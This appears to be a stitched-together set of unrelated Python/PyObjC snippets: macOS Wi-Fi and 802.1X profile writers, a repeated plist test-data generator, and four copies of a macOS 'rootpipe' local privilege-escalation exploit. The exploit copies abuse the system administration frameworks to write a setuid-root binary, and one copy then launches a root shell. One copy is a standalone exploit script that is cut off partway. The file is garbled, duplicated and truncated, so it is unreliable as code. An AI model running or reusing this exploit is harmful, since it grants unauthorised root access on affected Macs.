def createRecentNetwork(networkDict): path = '/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist' # Set to root as the owner for good measure uid = 0 gid = 80 if os.path.exists(path): plist = NSMutableDictionary.dictionaryWithContentsOfFile_(path) else: plist = NSMutableDictionary.alloc().init() port = getPlatformPortName() # Check for non-existant keys if not port in plist.keys(): plist[port] = {} # Make sure the Array is there if not 'RecentNetworks' in plist[port].keys(): plist[port]['RecentNetworks'] = [] _RecentNetworks = {} _RecentNetworks['SSID_STR'] = networkDict['ssid'] _RecentNetworks['SecurityType'] = networkDict['sect'] _RecentNetworks['Unique Network ID'] = networkDict['guid'] _RecentNetworks['Unique Password ID'] = networkDict['keyc'] plist[port]['RecentNetworks'].append(_RecentNetworks) exportFile = path plist.writeToFile_atomically_(exportFile,True) try: os.chown(path,uid,gid) except: print 'Path not found %s' % path
def genSnowProfile(networkDict): # EAPClientConfiguration AcceptEAPTypes = [] _AcceptEAPTypes = networkDict['eapt'] AcceptEAPTypes = [_AcceptEAPTypes] EAPClientConfiguration = {} EAPClientConfiguration['AcceptEAPTypes'] = AcceptEAPTypes EAPClientConfiguration['UserName'] = networkDict['user'] EAPClientConfiguration['UserPasswordKeychainItemID'] = networkDict['keyc'] # UserProfiles UserProfiles = [] _UserProfiles = {} _UserProfiles['ConnectByDefault'] = True _UserProfiles['EAPClientConfiguration'] = EAPClientConfiguration _UserProfiles['UniqueIdentifier'] = networkDict['keyc'] _UserProfiles['UserDefinedName'] = '%s-%s' % (networkDict['ssid'],networkDict['user']) _UserProfiles['Wireless Network'] = networkDict['ssid'] UserProfiles = [_UserProfiles] # 8021X plist = NSMutableDictionary.alloc().init() _8021X = {} _8021X['UserProfiles'] = UserProfiles plist['8021X'] = _8021X print plist exportFile = '/tmp/.importme.networkconnect' plist.writeToFile_atomically_(exportFile,True) return exportFile
def createKnownNetwork(networkDict): print 'Creating KnownNetworks entry' # There were some MacBook Airs that shipped with 10.5 path = '/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist' # Set to root as the owner for good measure uid = 0 gid = 80 if os.path.exists(path): plist = NSMutableDictionary.dictionaryWithContentsOfFile_(path) else: plist = NSMutableDictionary.alloc().init() plist['KnownNetworks'] = {} guid = networkDict['guid'] plist['KnownNetworks'][guid] = {} plist['KnownNetworks'][guid]['SSID_STR'] = networkDict['ssid'] plist['KnownNetworks'][guid]['Remembered channels'] = [networkDict['chan'],] plist['KnownNetworks'][guid]['SecurityType'] = networkDict['sect'] # If we are adding a non WPA2 Enterprise network add the keychain item if networkDict['type'] == 'WPA2': plist['KnownNetworks'][guid]['Unique Password ID'] = networkDict['keyc'] plist['KnownNetworks'][guid]['_timeStamp'] = NSDate.date() exportFile = path plist.writeToFile_atomically_(exportFile,True) try: os.chown(path,uid,gid) except: print 'Path not found %s' % path
def genLionProfile(networkDict={}): plist = NSMutableDictionary.alloc().init() # EAPClientConfiguration AcceptEAPTypes = [] _AcceptEAPTypes = networkDict['eapt'] AcceptEAPTypes = [_AcceptEAPTypes] tlsTrustedServerNames = [] EAPClientConfiguration = {} EAPClientConfiguration['AcceptEAPTypes'] = AcceptEAPTypes EAPClientConfiguration['TTLSInnerAuthentication'] = networkDict['iath'] EAPClientConfiguration['UserName'] = networkDict['user'] EAPClientConfiguration['UserPassword'] = networkDict['pass'] EAPClientConfiguration['tlsTrustedServerNames'] = tlsTrustedServerNames # PayloadContent PayloadContent = [] _PayloadContent = {} _PayloadContent['AuthenticationMethod'] = '' _PayloadContent['EAPClientConfiguration'] = EAPClientConfiguration _PayloadContent['EncryptionType'] = 'WPA' _PayloadContent['HIDDEN_NETWORK'] = False _PayloadContent['Interface'] = 'BuiltInWireless' _PayloadContent['PayloadDisplayName'] = '%s-%s' % (networkDict['ssid'],networkDict['user']) _PayloadContent['PayloadEnabled'] = True _PayloadContent['PayloadIdentifier'] = '%s.%s.alacarte.interfaces.%s' % (networkDict['mdmh'],networkDict['puid'],networkDict['suid']) _PayloadContent['PayloadType'] = 'com.apple.wifi.managed' _PayloadContent['PayloadUUID'] = networkDict['suid'] _PayloadContent['PayloadVersion'] = 1 _PayloadContent['SSID_STR'] = networkDict['ssid'] PayloadContent = [_PayloadContent] plist['PayloadContent'] = PayloadContent plist['PayloadDisplayName'] = networkDict['orgn'] plist['PayloadIdentifier'] = '%s.%s.alacarte' % (networkDict['mdmh'],networkDict['puid']) plist['PayloadOrganization'] = networkDict['orgn'] plist['PayloadRemovalDisallowed'] = False plist['PayloadScope'] = networkDict['scop'] plist['PayloadType'] = 'Configuration' plist['PayloadUUID'] = networkDict['puid'] plist['PayloadVersion'] = 1 # Show the plist on debug if(debugEnabled):print plist exportFile = '/tmp/.%s-%s.mobileconfig' % (networkDict['user'],networkDict['ssid']) plist.writeToFile_atomically_(exportFile,True) return exportFile
def verify(cls, args): source_binary = args['options']['target'] dest_binary = os.path.realpath(args['options']['dest_binary']) if not os.path.exists(source_binary): raise Exception("file does not exist!") pool = NSAutoreleasePool.alloc().init() attr = NSMutableDictionary.alloc().init() attr.setValue_forKey_(04777, NSFilePosixPermissions) data = NSData.alloc().initWithContentsOfFile_(source_binary) print "[*] will write file", dest_binary if cls.use_old_api(): adm_lib = cls.load_lib("/Admin.framework/Admin") Authenticator = objc.lookUpClass("Authenticator") ToolLiaison = objc.lookUpClass("ToolLiaison") SFAuthorization = objc.lookUpClass("SFAuthorization") authent = Authenticator.sharedAuthenticator() authref = SFAuthorization.authorization() # authref with value nil is not accepted on OS X <= 10.8 authent.authenticateUsingAuthorizationSync_(authref) st = ToolLiaison.sharedToolLiaison() tool = st.tool() tool.createFileWithContents_path_attributes_( data, dest_binary, attr) else: adm_lib = cls.load_lib( "/SystemAdministration.framework/SystemAdministration") WriteConfigClient = objc.lookUpClass("WriteConfigClient") client = WriteConfigClient.sharedClient() client.authenticateUsingAuthorizationSync_(None) tool = client.remoteProxy() tool.createFileWithContents_path_attributes_( data, dest_binary, attr, 0) print "[+] Done!" del pool args['success'] = True args['poc_ret']['dest_binary'] = dest_binary return args
def createEAPBinding(path,uid,gid,networkDict): macAddress = getAirportMac() if os.path.exists(path): plist = NSMutableDictionary.dictionaryWithContentsOfFile_(path) else: plist = NSMutableDictionary.alloc().init() plist[macAddress] = [] _item = {} _item['UniqueIdentifier'] = networkDict['keyc'] _item['Wireless Network'] = networkDict['ssid'] plist[macAddress].append(_item) exportFile = path plist.writeToFile_atomically_(exportFile,True) try: os.chown(path,uid,gid) except: print 'Path not found %s' % path
def createEAPProfile(path,uid,gid,networkDict): if os.path.exists(path): plist = NSMutableDictionary.dictionaryWithContentsOfFile_(path) else: plist = NSMutableDictionary.alloc().init() plist['Profiles'] = [] # item entry _Profiles = {} # EAPClientConfiguration EAPClientConfiguration = {} AcceptEAPTypes = [] _AcceptEAPTypes = networkDict['eapt'] AcceptEAPTypes = [_AcceptEAPTypes] # Top Level EAPClientConfiguration keys EAPClientConfiguration['AcceptEAPTypes'] = AcceptEAPTypes EAPClientConfiguration['Description'] = 'Automatic' EAPClientConfiguration['EAPFASTProvisionPAC'] = True EAPClientConfiguration['EAPFASTUsePAC'] = True EAPClientConfiguration['TLSVerifyServerCertificate'] = False EAPClientConfiguration['TTLSInnerAuthentication'] = networkDict['iath'] EAPClientConfiguration['UserName'] = networkDict['user'] EAPClientConfiguration['UserPasswordKeychainItemID'] = networkDict['keyc'] if not osVersion['minor'] == LEOP: EAPClientConfiguration['Wireless Security'] = networkDict['type'] # Top Level item keys _Profiles['EAPClientConfiguration'] = EAPClientConfiguration _Profiles['UniqueIdentifier'] = networkDict['keyc'] _Profiles['UserDefinedName'] = 'WPA: %s' % networkDict['ssid'] if not osVersion['minor'] == LEOP: _Profiles['Wireless Security'] = networkDict['type'] # Merge the data with current plist plist['Profiles'].append(_Profiles) exportFile = path plist.writeToFile_atomically_(exportFile,True) try: os.chown(path,uid,gid) except: print 'Path not found %s' % path
def verify(cls, args): source_binary = args['options']['target'] dest_binary = os.path.realpath(args['options']['dest_binary']) if not os.path.exists(source_binary): raise Exception("file does not exist!") pool = NSAutoreleasePool.alloc().init() attr = NSMutableDictionary.alloc().init() attr.setValue_forKey_(04777, NSFilePosixPermissions) data = NSData.alloc().initWithContentsOfFile_(source_binary) print "[*] will write file", dest_binary if cls.use_old_api(): adm_lib = cls.load_lib("/Admin.framework/Admin") Authenticator = objc.lookUpClass("Authenticator") ToolLiaison = objc.lookUpClass("ToolLiaison") SFAuthorization = objc.lookUpClass("SFAuthorization") authent = Authenticator.sharedAuthenticator() authref = SFAuthorization.authorization() # authref with value nil is not accepted on OS X <= 10.8 authent.authenticateUsingAuthorizationSync_(authref) st = ToolLiaison.sharedToolLiaison() tool = st.tool() tool.createFileWithContents_path_attributes_(data, dest_binary, attr) else: adm_lib = cls.load_lib("/SystemAdministration.framework/SystemAdministration") WriteConfigClient = objc.lookUpClass("WriteConfigClient") client = WriteConfigClient.sharedClient() client.authenticateUsingAuthorizationSync_(None) tool = client.remoteProxy() tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0) print "[+] Done!" del pool args['success'] = True args['poc_ret']['dest_binary'] = dest_binary return args
def main(): pl = OrderedDict() # Note: pl is an OrderedDict to control the order # of keys, and hence have some control on the structure # of the output file. # New keys should be added in alphabetical order. seconds = datetime.datetime(2004, 10, 26, 10, 33, 33, tzinfo=datetime.timezone(datetime.timedelta(0))).timestamp() pl[nsstr('aBigInt')] = 2 ** 63 - 44 pl[nsstr('aDate')] = NSDate.dateWithTimeIntervalSince1970_(seconds) pl[nsstr('aDict')] = d = OrderedDict() d[nsstr('aFalseValue')] = False d[nsstr('aTrueValue')] = True d[nsstr('aUnicodeValue')] = "M\xe4ssig, Ma\xdf" d[nsstr('anotherString')] = "<hello & 'hi' there!>" d[nsstr('deeperDict')] = dd = OrderedDict() dd[nsstr('a')] = 17 dd[nsstr('b')] = 32.5 dd[nsstr('c')] = a = NSMutableArray.alloc().init() a.append(1) a.append(2) a.append(nsstr('text')) pl[nsstr('aFloat')] = 0.5 pl[nsstr('aList')] = a = NSMutableArray.alloc().init() a.append(nsstr('A')) a.append(nsstr('B')) a.append(12) a.append(32.5) aa = NSMutableArray.alloc().init() a.append(aa) aa.append(1) aa.append(2) aa.append(3) pl[nsstr('aNegativeBigInt')] = -80000000000 pl[nsstr('aNegativeInt')] = -5 pl[nsstr('aString')] = nsstr('Doodah') pl[nsstr('anEmptyDict')] = NSMutableDictionary.alloc().init() pl[nsstr('anEmptyList')] = NSMutableArray.alloc().init() pl[nsstr('anInt')] = 728 pl[nsstr('nestedData')] = a = NSMutableArray.alloc().init() a.append(b'''<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03''') pl[nsstr('someData')] = b'<binary gunk>' pl[nsstr('someMoreData')] = b'''<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03''' pl[nsstr('\xc5benraa')] = nsstr("That was a unicode key.") print("TESTDATA={") for fmt_name, fmt_key in FORMATS: data, error = NSPropertyListSerialization.dataWithPropertyList_format_options_error_( pl, fmt_key, 0, None) if data is None: print("Cannot serialize", fmt_name, error) else: print(" %s: binascii.a2b_base64(b'''\n %s'''),"%(fmt_name, _encode_base64(bytes(data)).decode('ascii')[:-1])) print("}") print()
args = sys.argv if len(args) != 3: print "usage: exploit.py source_binary dest_binary_as_root" sys.exit(-1) source_binary = args[1] dest_binary = os.path.realpath(args[2]) if not os.path.exists(source_binary): raise Exception("file does not exist!") pool = NSAutoreleasePool.alloc().init() attr = NSMutableDictionary.alloc().init() attr.setValue_forKey_(04777, NSFilePosixPermissions) data = NSData.alloc().initWithContentsOfFile_(source_binary) print "will write file", dest_binary if use_old_api(): adm_lib = load_lib("/Admin.framework/Admin") Authenticator = objc.lookUpClass("Authenticator") ToolLiaison = objc.lookUpClass("ToolLiaison") SFAuthorization = objc.lookUpClass("SFAuthorization") authent = Authenticator.sharedAuthenticator() authref = SFAuthorization.authorization() # authref with value nil is not accepted on OS X <= 10.8
def main(): pl = OrderedDict() # Note: pl is an OrderedDict to control the order # of keys, and hence have some control on the structure # of the output file. # New keys should be added in alphabetical order. seconds = datetime.datetime(2004, 10, 26, 10, 33, 33, tzinfo=datetime.timezone(datetime.timedelta(0))).timestamp() pl[nsstr('aBigInt')] = 2 ** 63 - 44 pl[nsstr('aBigInt2')] = NSNumber.numberWithUnsignedLongLong_(2 ** 63 + 44) pl[nsstr('aDate')] = NSDate.dateWithTimeIntervalSince1970_(seconds) pl[nsstr('aDict')] = d = OrderedDict() d[nsstr('aFalseValue')] = False d[nsstr('aTrueValue')] = True d[nsstr('aUnicodeValue')] = "M\xe4ssig, Ma\xdf" d[nsstr('anotherString')] = "<hello & 'hi' there!>" d[nsstr('deeperDict')] = dd = OrderedDict() dd[nsstr('a')] = 17 dd[nsstr('b')] = 32.5 dd[nsstr('c')] = a = NSMutableArray.alloc().init() a.append(1) a.append(2) a.append(nsstr('text')) pl[nsstr('aFloat')] = 0.5 pl[nsstr('aList')] = a = NSMutableArray.alloc().init() a.append(nsstr('A')) a.append(nsstr('B')) a.append(12) a.append(32.5) aa = NSMutableArray.alloc().init() a.append(aa) aa.append(1) aa.append(2) aa.append(3) pl[nsstr('aNegativeBigInt')] = -80000000000 pl[nsstr('aNegativeInt')] = -5 pl[nsstr('aString')] = nsstr('Doodah') pl[nsstr('anEmptyDict')] = NSMutableDictionary.alloc().init() pl[nsstr('anEmptyList')] = NSMutableArray.alloc().init() pl[nsstr('anInt')] = 728 pl[nsstr('nestedData')] = a = NSMutableArray.alloc().init() a.append(b'''<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03''') pl[nsstr('someData')] = b'<binary gunk>' pl[nsstr('someMoreData')] = b'''<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03''' pl[nsstr('\xc5benraa')] = nsstr("That was a unicode key.") print("TESTDATA={") for fmt_name, fmt_key in FORMATS: data, error = NSPropertyListSerialization.dataWithPropertyList_format_options_error_( pl, fmt_key, 0, None) if data is None: print("Cannot serialize", fmt_name, error) else: print(" %s: binascii.a2b_base64(b'''\n %s'''),"%(fmt_name, _encode_base64(bytes(data)).decode('ascii')[:-1])) print("}") print()
def run(self): try: source_binary = self.options.get("src_file")[1] dest_binary = self.options.get("des_file")[1] if source_binary == None \ or source_binary == "" \ or dest_binary == None \ or dest_binary == "": self.print_error( "It's mandatory to specify a source file and a destination file!!" ) return if not os.path.exists(source_binary): self.print_error("File does not exist!") return if os.path.exists(dest_binary): self.print_error( "Destination file already exists. Use another name or remove/rename the original file!" ) return pool = NSAutoreleasePool.alloc().init() attr = NSMutableDictionary.alloc().init() attr.setValue_forKey_(0o04777, NSFilePosixPermissions) data = NSData.alloc().initWithContentsOfFile_(source_binary) self.print_info("will write file " + dest_binary) if self.use_old_api(): adm_lib = self.load_lib("/Admin.framework/Admin") Authenticator = objc.lookUpClass("Authenticator") ToolLiaison = objc.lookUpClass("ToolLiaison") SFAuthorization = objc.lookUpClass("SFAuthorization") authent = Authenticator.sharedAuthenticator() authref = SFAuthorization.authorization() # authref with value nil is not accepted on OS X <= 10.8 authent.authenticateUsingAuthorizationSync_(authref) st = ToolLiaison.sharedToolLiaison() tool = st.tool() tool.createFileWithContents_path_attributes_( data, dest_binary, attr) else: adm_lib = self.load_lib( "/SystemAdministration.framework/SystemAdministration") WriteConfigClient = objc.lookUpClass("WriteConfigClient") client = WriteConfigClient.sharedClient() client.authenticateUsingAuthorizationSync_(None) tool = client.remoteProxy() tool.createFileWithContents_path_attributes_( data, dest_binary, attr, 0) self.print_ok("Done!") del pool while not os.path.exists(dest_binary): self.print_info("Waiting file creation...") time.sleep(1) self.print_ok("Returning root whell at: " + dest_binary) subprocess.call(dest_binary) except OSError as e: if e.errno == os.errno.ENOENT: print("Sorry, iSelect binary - Not found!") else: print("Error executing exploit") raise
def main(): pl = OrderedDict() seconds = datetime.datetime(2004, 10, 26, 10, 33, 33, tzinfo=datetime.timezone(datetime.timedelta(0))).timestamp() pl[nsstr('aDate')] = NSDate.dateWithTimeIntervalSince1970_(seconds) pl[nsstr('aDict')] = d = OrderedDict() d[nsstr('aFalseValue')] = False d[nsstr('aTrueValue')] = True d[nsstr('aUnicodeValue')] = "M\xe4ssig, Ma\xdf" d[nsstr('anotherString')] = "<hello & 'hi' there!>" d[nsstr('deeperDict')] = dd = OrderedDict() dd[nsstr('a')] = 17 dd[nsstr('b')] = 32.5 dd[nsstr('c')] = a = NSMutableArray.alloc().init() a.append(1) a.append(2) a.append(nsstr('text')) pl[nsstr('aFloat')] = 0.5 pl[nsstr('aList')] = a = NSMutableArray.alloc().init() a.append(nsstr('A')) a.append(nsstr('B')) a.append(12) a.append(32.5) aa = NSMutableArray.alloc().init() a.append(aa) aa.append(1) aa.append(2) aa.append(3) pl[nsstr('aString')] = nsstr('Doodah') pl[nsstr('anEmptyDict')] = NSMutableDictionary.alloc().init() pl[nsstr('anEmptyList')] = NSMutableArray.alloc().init() pl[nsstr('anInt')] = 728 pl[nsstr('nestedData')] = a = NSMutableArray.alloc().init() a.append(b'''<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03''') pl[nsstr('someData')] = b'<binary gunk>' pl[nsstr('someMoreData')] = b'''<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03<lots of binary gunk>\x00\x01\x02\x03''' pl[nsstr('\xc5benraa')] = nsstr("That was a unicode key.") print("TESTDATA={") for fmt_name, fmt_key in FORMATS: data, error = NSPropertyListSerialization.dataWithPropertyList_format_options_error_( pl, fmt_key, 0, None) if data is None: print("Cannot serialize", fmt_name, error) else: print(" %s: binascii.a2b_base64(b'''\n %s'''),"%(fmt_name, _encode_base64(bytes(data)).decode('ascii')[:-1])) print("}") print()